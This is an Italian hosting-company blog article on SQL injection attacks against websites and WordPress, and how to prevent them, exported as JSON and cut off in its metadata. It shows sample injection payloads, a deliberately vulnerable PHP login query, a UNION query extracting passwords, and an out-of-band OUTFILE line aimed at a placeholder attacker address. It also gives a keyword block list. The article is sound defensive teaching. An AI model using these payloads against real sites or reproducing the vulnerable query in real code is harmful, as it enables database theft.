{"id":31805,"date":"2023-10-17T02:07:03","date_gmt":"2023-10-17T01:07:03","guid":{"rendered":"https:\/\/kinsta.com\/?p=62827"},"modified":"2023-10-23T11:17:41","modified_gmt":"2023-10-23T10:17:41","slug":"sql-injection","status":"publish","type":"post","link":"https:\/\/kinsta.com\/it\/blog\/sql-injection\/","title":{"rendered":"SQL Injection: guida dettagliata per gli utenti di WordPress"},"content":{"rendered":"<p>Una SQL injection \u00e8 una tecnica di iniezione di codice che gli aggressori utilizzano per sfruttare le vulnerabilit\u00e0 nel livello di database di un sito web o di un&#8217;applicazione. Se gli aggressori riescono a mettere a segno una SQL injection, possono ottenere l&#8217;accesso al database.<\/p>\n<p>Capire come funzionano questi attacchi vi aiuter\u00e0 ad attrezzarvi meglio per prevenirli. In questo modo potrete tenere al sicuro sia il vostro sito web che i vostri clienti.<\/p>\n<p>In questo post esploreremo i diversi tipi di iniezioni SQL. Vi mostreremo anche come proteggere il sito da questi attacchi. Tuffiamoci in questo articolo!<\/p>\n<div><\/div><kinsta-auto-toc heading=\"Table of Contents\" exclude=\"last\" list-style=\"arrow\" selector=\"h2\" count-number=\"-1\"><\/kinsta-auto-toc>\n<h2>Cos&#8217;\u00e8 una SQL injection?<\/h2>\n<p>L&#8217;SQL (Structured Query Language) \u00e8 un linguaggio che ci permette di <a href=\"https:\/\/kinsta.com\/it\/blog\/database-wordpress\/\">interagire con i database<\/a>. Le moderne applicazioni web utilizzano i database per gestire i dati e mostrare contenuti dinamici ai lettori.<\/p>\n<p>Una SQL injection (o SQLi) si verifica quando un utente cerca di inserire istruzioni SQL dannose in un&#8217;applicazione web. Se ci riesce, sar\u00e0 in grado di accedere ai dati sensibili del database.<\/p>\n<p>Nel 2023, le SQL injection rimangono tra gli attacchi pi\u00f9 comuni sul web. Solo nel 2022 sono state aggiunte <a href=\"https:\/\/www.cvedetails.com\/vulnerability-list\/year-2022\/opsqli-1\/sql-injection.html\" target=\"_blank\" rel=\"noopener noreferrer\">1162 vulnerabilit\u00e0 di SQL injection<\/a> al database di sicurezza CVE.<\/p>\n<p>La buona notizia \u00e8 che le SQL injection non sono pi\u00f9 cos\u00ec diffuse come un tempo. La maggior parte delle applicazioni si \u00e8 evoluta per proteggersi dagli attacchi SQL.<\/p>\n<p>Nel 2012, il <a href=\"https:\/\/www.techworld.com\/news\/security\/barclays-97-percent-of-data-breaches-still-due-sql-injection-3331283\/\" target=\"_blank\" rel=\"noopener noreferrer\">97% di tutte le violazioni di dati<\/a> era dovuto a iniezioni SQL. Oggi questo numero \u00e8 ancora alto, ma molto pi\u00f9 gestibile.<\/p>\n<h2>Come funziona la vulnerabilit\u00e0 SQL injection?<\/h2>\n<p>Una vulnerabilit\u00e0 SQL injection consente a un aggressore di accedere completamente al database dell&#8217;applicazione attraverso l&#8217;uso di istruzioni SQL dannose.<\/p>\n<p>Vediamo un esempio di applicazione vulnerabile.<\/p>\n<p>Immaginate il flusso di lavoro di una tipica applicazione web che prevede la richiesta di database attraverso gli input dell&#8217;utente. Si prende l&#8217;input dell&#8217;utente attraverso un modulo, ad esempio un modulo di login. Quindi si interroga il database con i campi inviati dall&#8217;utente per autenticarlo. La struttura della query al database \u00e8 simile a questa:<\/p>\n<pre><code class=\"language-sql\">select * from user_table\nwhere username = 'sdaityari'\nand password = 'mypassword';<\/code><\/pre>\n<p>Per semplicit\u00e0, supponiamo che si stia memorizzando le password in chiaro. Tuttavia, \u00e8 buona norma <a href=\"https:\/\/kinsta.com\/it\/blog\/sali-di-wordpress\/\">eseguire il salt delle password<\/a> e poi l&#8217;hash. Se avete ricevuto il nome utente e la password dal modulo, potete definire la query in PHP come segue:<\/p>\n<pre><code class=\"language-php\">\/\/ Connect to SQL database\n$db_query = \"select * from user_table where\nusername = '\".$user.\"'\nAND password = '\".$password.\"';\";\n\/\/ Execute query<\/code><\/pre>\n<p>Se qualcuno inserisce il valore &#8220;admin&#8217;;-&#8221; nel campo del nome utente, la query SQL che la variabile $db_query genera sar\u00e0 la seguente:<\/p>\n<pre><code class=\"language-sql\">select * from user_table where\nusername = 'admin';--' and password = 'mypassword'<\/code><\/pre>\n<p>Cosa fa questa query?<\/p>\n<p>Un commento in SQL inizia con un doppio trattino &#8211;, quindi tutto ci\u00f2 che segue viene ignorato. Questo rimuove di fatto il controllo della password dalla query. Di conseguenza, se &#8220;admin&#8221; \u00e8 un nome utente valido, chi attacca pu\u00f2 accedere senza conoscere la password. Questo almeno se non ci sono misure di sicurezza contro questo tipo di attacchi.<\/p>\n<p>In alternativa, in questo esempio \u00e8 possibile utilizzare un attacco booleano per ottenere l&#8217;accesso. Se un utente malintenzionato inserisce &#8220;password&#8217; o 1=1;-&#8221; nel campo della password, la query risultante sar\u00e0 la seguente:<\/p>\n<pre><code class=\"language-sql\">select * from user_table where\nusername = 'admin' and\npassword = 'password' or 1=1;--';<\/code><\/pre>\n<p>In questo caso, anche se la password \u00e8 sbagliata, verrete autenticati nell&#8217;applicazione. Se la pagina web visualizza i risultati della query del database, un utente malintenzionato pu\u00f2 utilizzare il comando per mostrare le tabelle, il comando per visualizzare le tabelle del database e quindi eliminare selettivamente le tabelle se lo desidera.<\/p>\n<figure>\n<figure style=\"width: 666px\" class=\"wp-caption alignnone\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/kinsta.com\/wp-content\/uploads\/2023\/09\/sql-injection-cartoon.png\" alt=\"Exploits of a Mom: una vignetta sull'iniezione SQL \" width=\"666\" height=\"205\"><figcaption class=\"wp-caption-text\">Una vignetta sulla SQL injection (<strong>Fonte: <\/strong><a href=\"https:\/\/xkcd.com\/327\/\" target=\"_blank\" rel=\"noopener noreferrer\">XKCD<\/a>)<\/figcaption><\/figure>\n<p>Exploits of a Mom, una popolare striscia a fumetti di XKCD, mostra la conversazione di una madre al telefono con la scuola di suo figlio, dove le viene chiesto se ha davvero chiamato suo figlio &#8220;Robert&#8221;); DROP TABLE Students; -&#8220;.<\/figure>\n<h2>Tipi di SQL Injection<\/h2>\n<p>Ora che conosciamo le basi di una vulnerabilit\u00e0 SQL injection, analizziamo i vari tipi di attacchi SQL injection e le ragioni di ciascuno di essi.<\/p>\n<h3>Iniezione SQL in-band<\/h3>\n<p>L&#8217;iniezione SQL in-band \u00e8 la forma pi\u00f9 semplice di SQL injection. In questo processo, chi attacca \u00e8 in grado di utilizzare lo stesso canale per inserire il codice SQL dannoso nell&#8217;applicazione e raccogliere i risultati.<\/p>\n<p>Vediamo due forme di attacchi di SQL injection in-band.<\/p>\n<h4>Attacco basato su errori<\/h4>\n<p>Un attacco basato su errori avviene quando qualcuno manipola intenzionalmente la query SQL per generare un errore del database. Il messaggio di errore restituito dal database spesso include informazioni sulla struttura del database, che chi attacca pu\u00f2 utilizzare per sfruttare ulteriormente il sistema.<\/p>\n<p>Ad esempio, un aggressore pu\u00f2 inserire &#8216; OR &#8216;1&#8217;=&#8217;1 in un campo di un modulo. Se l&#8217;applicazione \u00e8 vulnerabile, potrebbe restituire un messaggio di errore che rivela informazioni sul database.<\/p>\n<h4>Attacco union-based<\/h4>\n<p>Gli attacchi SQL injection union-based utilizzano l&#8217;operatore SQL UNION per combinare i risultati della query originale con i risultati di query dannose iniettate.<\/p>\n<p>Questo permette a chi attacca di recuperare informazioni da altre tabelle del database:<\/p>\n<pre><code class=\"language-sql\">select title, link from post_table\nwhere id &lt; 10\nunion\nselect username, password\nfrom user_table; --;<\/code><\/pre>\n<p>In questa query, l&#8217;operatore UNION combina i risultati della query originale con i risultati di <em>SELECT username<\/em>, <em>password<\/em> <em>FROM user_table<\/em>. Se l&#8217;applicazione \u00e8 vulnerabile e non sanifica correttamente l&#8217;input dell&#8217;utente, potrebbe restituire una pagina che include nomi utente e password dalla tabella utenti.<\/p>\n<h2>SQL injection inferenziale (Blind SQL Injection)<\/h2>\n<p>Anche se un aggressore genera un errore nella query SQL, la risposta della query potrebbe non essere trasmessa direttamente alla pagina web. In questo caso, l&#8217;aggressore dovr\u00e0 indagare ulteriormente.<\/p>\n<p>In questa forma di SQL injection, chi attacca invia diverse query al database per valutare come l&#8217;applicazione analizza le risposte. Un&#8217;iniezione SQL inferenziale \u00e8 talvolta nota anche come Blind SQL Injection.<\/p>\n<p>Di seguito analizzeremo due tipi di iniezioni SQL inferenziali: SQL injection booleana e SQL injection basata sul tempo.<\/p>\n<h4>Attacco booleano<\/h4>\n<p>Se una query SQL produce un errore che non \u00e8 stato gestito internamente all&#8217;applicazione, la pagina web risultante pu\u00f2 lanciare un errore, caricare una pagina vuota o caricarla parzialmente. In un&#8217;iniezione SQL booleana, chi attacca valuta quali parti dell&#8217;input dell&#8217;utente sono vulnerabili alle iniezioni SQL provando due diverse versioni di una clausola booleana attraverso l&#8217;input:<\/p>\n<ul>\n<li>&#8220;&#8230; e 1=1&#8221;<\/li>\n<li>&#8220;&#8230; e 1=2&#8221;<\/li>\n<\/ul>\n<p>Queste query sono progettate per avere una condizione che pu\u00f2 essere vera o falsa. Se la condizione \u00e8 vera, la pagina verr\u00e0 caricata normalmente. Se \u00e8 falsa, la pagina potrebbe caricarsi in modo diverso o mostrare un errore.<\/p>\n<p>Osservando il caricamento della pagina, l&#8217;aggressore pu\u00f2 determinare se la condizione era vera o falsa, anche se non vede l&#8217;effettiva query SQL o la risposta del database. Se mettete insieme diverse condizioni simili, potrete estrarre lentamente informazioni dal database.<\/p>\n<h4>Attacco basato sul tempo<\/h4>\n<p>Un attacco SQL injection basato sul tempo pu\u00f2 aiutare un aggressore a <a href=\"https:\/\/kinsta.com\/it\/docs\/informazioni-sul-servizio\/vulnerabilita-sicurezza\/\">determinare se una vulnerabilit\u00e0 \u00e8 presente<\/a> in un&#8217;applicazione web. Chi attacca utilizza una funzione a tempo predefinita del sistema di gestione del database utilizzato dall&#8217;applicazione. Ad esempio, <a href=\"https:\/\/kinsta.com\/it\/blog\/cosa-e-mysql\/\">in MySQL<\/a>, la <a href=\"http:\/\/dev.mysql.com\/doc\/refman\/5.0\/en\/miscellaneous-functions.html#function_sleep\" target=\"_blank\" rel=\"noopener noreferrer\">funzione<em>sleep()<\/em><\/a> indica al database di attendere un certo numero di secondi.<\/p>\n<pre><code class=\"language-sql\">select * from comments\nWHERE post_id=1-SLEEP(15);<\/code><\/pre>\n<p>Se una query di questo tipo produce un ritardo, chi attacca sapr\u00e0 che \u00e8 vulnerabile. Questo approccio \u00e8 simile agli attacchi booleani in quanto non si ottiene una risposta effettiva dal database. Tuttavia, \u00e8 possibile ottenere informazioni se l&#8217;attacco ha successo.<\/p>\n<h2>Iniezione SQL fuori banda<\/h2>\n<p>In un attacco di tipo out-of-band SQL Injection, chi attacca manipola la query SQL per istruire il database a trasmettere i dati a un server controllato dall&#8217;aggressore. Questo avviene in genere utilizzando funzioni del database che possono richiedere risorse esterne, come ad esempio richieste HTTP o query DNS.<\/p>\n<p>Un attacco di tipo out-of-band SQL injection utilizza una funzionalit\u00e0 di file process esterno del DBMS. In MySQL, le funzioni LOAD_FILE() e INTO OUTFILE possono essere utilizzate per richiedere a MySQL di trasmettere i dati a una fonte esterna.<\/p>\n<p>Ecco come un aggressore potrebbe utilizzare OUTFILE per inviare i risultati di una query a una fonte esterna:<\/p>\n<pre><code class=\"language-sql\">select * from post_table\ninto OUTFILE '\\\\MALICIOUS_IP_ADDRESSlocation'<\/code><\/pre>\n<p>Allo stesso modo, la funzione LOAD_FILE() pu\u00f2 essere utilizzata per leggere un file dal server e visualizzarne il contenuto. Una combinazione di LOAD_FILE() e OUTFILE pu\u00f2 essere utilizzata per leggere il contenuto di un file sul server e poi trasmetterlo in un&#8217;altra posizione.<\/p>\n<h2>Come prevenire le SQL injection<\/h2>\n<p>Finora abbiamo esplorato le vulnerabilit\u00e0 di un&#8217;applicazione web che possono portare ad attacchi di tipo SQL injection. Una vulnerabilit\u00e0 di tipo SQL injection pu\u00f2 essere utilizzata da un aggressore per leggere, modificare o addirittura rimuovere il contenuto del database.<\/p>\n<p>Inoltre, pu\u00f2 anche consentire di leggere un file in qualsiasi punto del server e trasferirne il contenuto altrove. In questa sezione esploriamo varie tecniche per proteggere le applicazioni web e un sito web dagli attacchi di SQL injection.<\/p>\n<h3>Eseguire l&#8217;escape degli input dell&#8217;utente<\/h3>\n<p>In generale, \u00e8 difficile stabilire se una stringa dell&#8217;utente sia dannosa o meno. Per questo motivo, un approccio comune \u00e8 quello di sfuggire ai caratteri speciali nell&#8217;input dell&#8217;utente. Questo processo pu\u00f2 aiutare a proteggersi dagli attacchi di SQL injection.<\/p>\n<p>In PHP, \u00e8 possibile eseguire l&#8217;escape di una stringa prima di creare la query utilizzando la funzione <code>mysqli_real_escape_string()<\/code>:<\/p>\n<pre><code class=\"language-sql\">$unsafe_variable = $_POST[\"user_input\"]; $safe_variable = mysqli_real_escape_string($conn, $unsafe_variable);<\/code><\/pre>\n<p>Quando si visualizza l&#8217;input dell&#8217;utente come HTML, \u00e8 anche importante convertire i caratteri speciali nei corrispondenti caratteri HTML per prevenire gli attacchi Cross-Site Scripting (XSS). Potete convertire i caratteri speciali in PHP utilizzando la funzione <code>htmlspecialchars()<\/code>.<\/p>\n<h3>Usare le dichiarazioni preparate<\/h3>\n<p>In alternativa, si possono utilizzare le dichiarazioni preparate per evitare le iniezioni SQL. Una dichiarazione preparata \u00e8 un modello di query SQL, in cui si specificano i parametri in una fase successiva per eseguirla.<\/p>\n<p>Ecco un esempio di dichiarazione preparata in PHP e MySQLi:<\/p>\n<pre><code class=\"language-php\">$query = $mysql_connection-&gt;prepare(\"select * from user_table where username = ? and password = ?\");\n$query-&gt;execute(array($username, $password));<\/code><\/pre>\n<h3>Altri controlli di igiene per prevenire gli attacchi SQL<\/h3>\n<p>Il passo successivo per mitigare questa vulnerabilit\u00e0 \u00e8 limitare l&#8217;accesso al database solo allo stretto necessario.<\/p>\n<p>Ad esempio, potete collegare l&#8217;applicazione web al DBMS utilizzando un utente specifico che abbia accesso solo al database in questione.<\/p>\n<p>Inoltre, dovrete limitare l&#8217;accesso dell&#8217;utente del database a tutte le altre postazioni del server. Potreste anche voler bloccare alcune parole chiave SQL nell&#8217;URL attraverso il server web.<\/p>\n<p>Se <a href=\"https:\/\/kinsta.com\/it\/blog\/nginx-verso-apache\/\">utilizzate Apache<\/a> come server web, potete utilizzare le seguenti righe di codice nel file <em><a href=\"https:\/\/kinsta.com\/it\/blog\/file-htaccess-wordpress\/\">.htaccess<\/a><\/em> per mostrare un <a href=\"https:\/\/kinsta.com\/it\/blog\/errore-403-forbidden\/#:~:text=The%20403%20Forbidden%20error%20means%20that%20your%20server%20is%20working,file%20permissions%20or%20.htaccess%20file.\">errore<em>403 Forbidden<\/em><\/a> a un potenziale aggressore.<\/p>\n<p>Prestate attenzione prima di utilizzare questa tecnica perch\u00e9 Apache mostrer\u00e0 un errore al lettore se l&#8217;URL contiene queste parole chiave.<\/p>\n<pre><code>RewriteCond %{QUERY_STRING} [^a-z](declare\u00a6char\u00a6set\u00a6cast\u00a6convert\u00a6delete\u00a6drop\u00a6exec\u00a6insert\u00a6meta\u00a6script\u00a6select\u00a6truncate\u00a6update)[^a-z] [NC]\nRewriteRule (.*) - [F]<\/code><\/pre>\n<aside role=\"note\" class=\"wp-block-kinsta-notice is-style-info\">\n            <h3>Info<\/h3>\n        <p>Kinsta utilizza WordPress sul server web Nginx, che non supporta un file .htaccess. Se volete impostare una regola per bloccare le parole chiave nell&#8217;URL, contattate il team di supporto di Kinsta e vi aiuteremo.<\/p>\n<\/aside>\n\n<p>Come ulteriore consiglio di prevenzione, dovete sempre <a href=\"https:\/\/kinsta.com\/it\/blog\/wordpress-hacked\/#2-keep-your-site-updated\">utilizzare un software aggiornato<\/a>. Quando viene rilasciata una nuova versione o una patch, i bug risolti nell&#8217;aggiornamento sono descritti nelle note di rilascio. Quando i dettagli di un bug vengono resi pubblici, l&#8217;utilizzo di una vecchia versione di un software pu\u00f2 essere rischioso.<\/p>\n<h2>SQL injection in WordPress<\/h2>\n<p>Se utilizzate i file core di WordPress aggiornati, sarete al sicuro da qualsiasi vulnerabilit\u00e0 di tipo SQL injection. Tuttavia, l&#8217;utilizzo di plugin e temi di terze parti espone il sito web a un certo livello di vulnerabilit\u00e0. Potete mitigare ampiamente questo rischio utilizzando plugin e temi che ricevono aggiornamenti regolari e che seguono pratiche di codifica sicure.<\/p>\n<p>Il vostro sito WordPress \u00e8 forte quanto il suo anello pi\u00f9 debole. In questa sezione analizziamo le considerazioni chiave per mitigare la vulnerabilit\u00e0 della SQL injection in WordPress e come eseguire controlli di vulnerabilit\u00e0 sul vostro sito WordPress esistente.<\/p>\n<h3>Prevenzione della vulnerabilit\u00e0 SQL Injection per WordPress<\/h3>\n<p>Per mitigare la vulnerabilit\u00e0 dell&#8217;iniezione SQL nel <a href=\"https:\/\/kinsta.com\/it\/blog\/temi-wordpress-veloci\/\">tema WordPress<\/a> o in un plugin, l&#8217;unica regola da seguire \u00e8 quella di utilizzare sempre le funzioni esistenti di WordPress quando interagite con il database.<\/p>\n<p>Queste funzioni vengono accuratamente testate per verificare la presenza di vulnerabilit\u00e0 da SQL injection durante il processo di sviluppo di WordPress. Ad esempio, se volete aggiungere un commento a un post, utilizzate la funzione <em><a href=\"https:\/\/developer.wordpress.org\/reference\/functions\/wp_insert_comment\/\" target=\"_blank\" rel=\"noopener noreferrer\">wp_insert_comment()<\/a><\/em> anzich\u00e9 inserire i dati direttamente nella tabella <em>wp_comments<\/em>.<\/p>\n<p>Sebbene le funzioni siano estensibili, a volte potreste aver bisogno di eseguire una query complessa. In questo caso, assicuratevi di utilizzare il <a href=\"https:\/\/developer.wordpress.org\/reference\/classes\/wpdb\/\" target=\"_blank\" rel=\"noopener noreferrer\">gruppo di funzioni<em>$wp_db<\/em><\/a>. Potete usare <em>$wpdb-&gt;prepare()<\/em> per evitare l&#8217;input dell&#8217;utente prima di creare la query.<\/p>\n<p>Inoltre, ecco un elenco di funzioni per <a href=\"https:\/\/developer.wordpress.org\/themes\/theme-security\/data-sanitization-escaping\/\" target=\"_blank\" rel=\"noopener noreferrer\">sanificare i dati in WordPress<\/a>. Queste funzioni possono aiutare a evitare determinati tipi di input dell&#8217;utente, come e-mail e URL.<\/p>\n<h2>Proteggere un sito WordPress<\/h2>\n<p>Sebbene <a href=\"https:\/\/kinsta.com\/it\/blog\/wordpress-e-sicuro\/\">WordPress sia di per s\u00e9 sicuro<\/a>, problemi come il software di base non aggiornato e i <a href=\"https:\/\/kinsta.com\/it\/blog\/plugin-temi-wordpress-annullati\/\">plugin non funzionanti<\/a> possono portare a vulnerabilit\u00e0. Anche se non c&#8217;\u00e8 alternativa a controllare accuratamente il vostro sito WordPress per verificare la presenza di vulnerabilit\u00e0 SQL injection, la complessit\u00e0 di un sito web pu\u00f2 rendere questo compito difficile.<\/p>\n<p>Potete utilizzare uno strumento di scansione online come <a href=\"https:\/\/wpscan.org\/\" target=\"_blank\" rel=\"noopener noreferrer\">WPScan<\/a>. Vi consigliamo anche di controllare i vostri plugin per verificare se il loro sviluppo si \u00e8 fermato. Se non vengono pi\u00f9 mantenuti, potrebbe non essere una buona idea utilizzarli sul vostro sito.<\/p>\n<p>Se dovete ancora utilizzarli, assicuratevi di testare accuratamente il loro codice e le loro funzionalit\u00e0 per individuare eventuali vulnerabilit\u00e0. Oltre a questo, assicuratevi di seguire questi controlli igienici:<\/p>\n<ul>\n<li>Aggiornare PHP, il core di WordPress e MySQL<\/li>\n<li>Aggiornare i plugin e i temi di terze parti<\/li>\n<li>Evitare di usare l&#8217;utente root per connettervi al database SQL<\/li>\n<li>Limitare l&#8217;accesso dell&#8217;utente SQL alle directory sensibili<\/li>\n<li>Bloccare le keyword SQL che utilizzano il server<\/li>\n<li>Conservate i backup del sito all\u2019esterno in caso di danni irreversibili<\/li>\n<\/ul>\n<p>Qui trovate un articolo dettagliato sulla <a href=\"https:\/\/kinsta.com\/it\/blog\/wordpress-e-sicurezza\/\">sicurezza di WordPress<\/a> e un elenco esaustivo di controlli. Inoltre, potreste voler investire in questi <a href=\"https:\/\/kinsta.com\/it\/blog\/plugin-sicurezza-wordpress\/\">ottimi plugin di sicurezza per WordPress<\/a>. Ecco cosa fare se il <a href=\"https:\/\/kinsta.com\/it\/blog\/wordpress-hacked\/\">sito WordPress viene violato<\/a> nonostante i vostri sforzi.<\/p>\n<aside role=\"note\" class=\"wp-block-kinsta-notice is-style-info\">\n            <h3>Info<\/h3>\n        <p>Tutti i siti WordPress ospitati su Kinsta si appoggiano a Cloudflare, con misure di sicurezza di livello enterprise e strumenti inclusi nel loro piano.<\/p>\n<\/aside>\n\n<h2>L&#8217;iniezione SQL \u00e8 illegale?<\/h2>\n<p>Decisamente s\u00ec! Anche se c&#8217;\u00e8 una vera e propria vulnerabilit\u00e0, un aggressore sta comunque cercando di accedere a dati che altrimenti non sarebbero disponibili.<\/p>\n<p>Immaginate uno scenario in cui qualcuno lascia le chiavi in macchina. Guidarla costituisce un reato solo perch\u00e9 \u00e8 stata lasciata aperta e incustodita?<\/p>\n<p>L&#8217;atto di SQLi viene perseguito secondo leggi diverse in vari paesi. Rientra nel <a href=\"https:\/\/www.justice.gov\/sites\/default\/files\/criminal-ccips\/legacy\/2015\/01\/14\/ccmanual.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Computer Fraud and Abuse Act<\/a> (1986) negli Stati Uniti e nel <a href=\"http:\/\/www.legislation.gov.uk\/ukpga\/1990\/18\/contents\" target=\"_blank\" rel=\"noopener noreferrer\">Computer Misuse Act<\/a> (1990) nel Regno Unito.<\/p>\n<h2>Riepilogo<\/h2>\n<p>Le SQL injection sono da tempo uno degli attacchi pi\u00f9 comuni a tutti i tipi di siti web. Nemmeno WordPress pu\u00f2 proteggere dalla possibilit\u00e0 di attacchi SQL se non si adottano misure per mantenere il sito web sicuro.<\/p>\n<p>Per prevenire questi attacchi, dovrete:<\/p>\n<ul>\n<li>Capire come funziona la vulnerabilit\u00e0 SQL Injection<\/li>\n<li>Esplorare i vari modi in cui gli aggressori possono utilizzare SQLi per ottenere un accesso non autorizzato alla tua applicazione web<\/li>\n<li>Implementare metodi per proteggere il vostro sito web dagli attacchi SQLi, come l&#8217;escape degli input dell&#8217;utente e l&#8217;utilizzo di dichiarazioni preparate<\/li>\n<li>Seguire una routine di controlli di sicurezza<\/li>\n<\/ul>\n<p>Risparmiate tempo e costi e massimizzate le prestazioni del vostro sito con oltre 275 dollari di integrazioni di livello enterprise incluse in ogni piano WordPress gestito. Questo include un CDN ad alte prestazioni, protezione DDoS, mitigazione di malware e hack, Edge Caching e le CPU pi\u00f9 veloci di Google. Iniziate subito a lavorare senza contratti a lungo termine, e con migrazioni assistite e una garanzia di rimborso di 30 giorni.<\/p>\n<p><a href=\"https:\/\/kinsta.com\/it\/hosting-wordpress\/\">Date un&#8217;occhiata ai nostri piani<\/a> o parlate con il team vendite per trovare il piano pi\u00f9 adatto a voi.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Una SQL injection \u00e8 una tecnica di iniezione di codice che gli aggressori utilizzano per sfruttare le vulnerabilit\u00e0 nel livello di database di un sito web &#8230;<\/p>\n","protected":false},"author":118,"featured_media":31808,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_kinsta_gated_content":false,"_kinsta_gated_content_redirect":"","footnotes":""},"tags":[30,6334],"topic":[25873],"class_list":["post-31805","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","tag-sicurezza-web","tag-wordpresshack","topic-sviluppo-wordpress"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v24.6 (Yoast SEO v24.6) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>SQL Injection: guida dettagliata per gli utenti di WordPress - Kinsta\u00ae<\/title>\n<meta name=\"description\" content=\"Scopri cos&#039;\u00e8 una SQL injection, come la vulnerabilit\u00e0 SQL injection pu\u00f2 trovarsi nelle tue applicazioni web (come i siti WordPress) e come prevenire gli attacchi.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kinsta.com\/it\/blog\/sql-injection\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SQL Injection: guida dettagliata per gli utenti di WordPress\" \/>\n<meta property=\"og:description\" content=\"Scopri cos&#039;\u00e8 una SQL injection, come la vulnerabilit\u00e0 SQL injection pu\u00f2 trovarsi nelle tue applicazioni web (come i siti WordPress) e come prevenire gli attacchi.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kinsta.com\/it\/blog\/sql-injection\/\" \/>\n<meta property=\"og:site_name\" content=\"Kinsta\u00ae\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/kinstaitalia\/\" \/>\n<meta property=\"article:published_time\" content=\"2023-10-17T01:07:03+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-10-23T10:17:41+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/kinsta.com\/it\/wp-content\/uploads\/sites\/2\/2020\/01\/sql-injection.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1460\" \/>\n\t<meta property=\"og:image:height\" content=\"730\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Shaumik Daityari\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:description\" content=\"Scopri cos&#039;\u00e8 una SQL injection, come la vulnerabilit\u00e0 SQL injection pu\u00f2 trovarsi nelle tue applicazioni web (come i siti WordPress) e come prevenire gli attacchi.\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/kinsta.com\/it\/wp-content\/uploads\/sites\/2\/2020\/01\/sql-injection.jpg\" \/>\n<meta name=\"twitter:creator\" content=\"@Kinsta_IT\" \/>\n<meta name=\"twitter:site\" content=\"@Kinsta_IT\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"Shaumik Daityari\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"13 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kinsta.com\/it\/blog\/sql-injection\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kinsta.com\/it\/blog\/sql-injection\/\"},\"author\":{\"name\":\"Shaumik Daityari\",\"@id\":\"https:\/\/kinsta.com\/it\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036\"},\"headline\":\"SQL Injection: guida dettagliata per gli utenti di WordPress\",\"datePublished\":\"2023-10-17T01:07:03+00:00\",\"dateModified\":\"2023-10-23T10:17:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kinsta.com\/it\/blog\/sql-injection\/\"},\"wordCount\":2549,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kinsta.com\/it\/#organization\"},\"image\":{\"@id\":\"https:\/\/kinsta.com\/it\/blog\/sql-injection\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/kinsta.com\/it\/wp-content\/uploads\/sites\/2\/2020\/01\/sql-injection.jpg\",\"keywords\":[\"sicurezza web\",\"wordpresshack\"],\"articleSection\":[\"Sicurezza di WordPress\"],\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kinsta.com\/it\/blog\/sql-injection\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kinsta.com\/it\/blog\/sql-injection\/\",\"url\":\"https:\/\/kinsta.com\/it\/blog\/sql-injection\/\",\"name\":\"SQL Injection: guida dettagliata per gli utenti di WordPress - Kinsta\u00ae\",\"isPartOf\":{\"@id\":\"https:\/\/kinsta.com\/it\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kinsta.com\/it\/blog\/sql-injection\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kinsta.com\/it\/blog\/sql-injection\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/kinsta.com\/it\/wp-content\/uploads\/sites\/2\/2020\/01\/sql-injection.jpg\",\"datePublished\":\"2023-10-17T01:07:03+00:00\",\"dateModified\":\"2023-10-23T10:17:41+00:00\",\"description\":\"Scopri cos'\u00e8 una SQL injection, come la vulnerabilit\u00e0 SQL injection pu\u00f2 trovarsi nelle tue applicazioni web (come i siti WordPress) e come prevenire gli attacchi.\",\"breadcrumb\":{\"@id\":\"https:\/\/kinsta.com\/it\/blog\/sql-injection\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kinsta.com\/it\/blog\/sql-injection\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/kinsta.com\/it\/blog\/sql-injection\/#primaryimage\",\"url\":\"https:\/\/kinsta.com\/it\/wp-content\/uploads\/sites\/2\/2020\/01\/sql-injection.jpg\",\"contentUrl\":\"https:\/\/kinsta.com\/it\/wp-content\/uploads\/sites\/2\/2020\/01\/sql-injection.jpg\",\"width\":1460,\"height\":730,\"caption\":\"SQL Injection: Una Guida Introduttiva per gli Utenti di 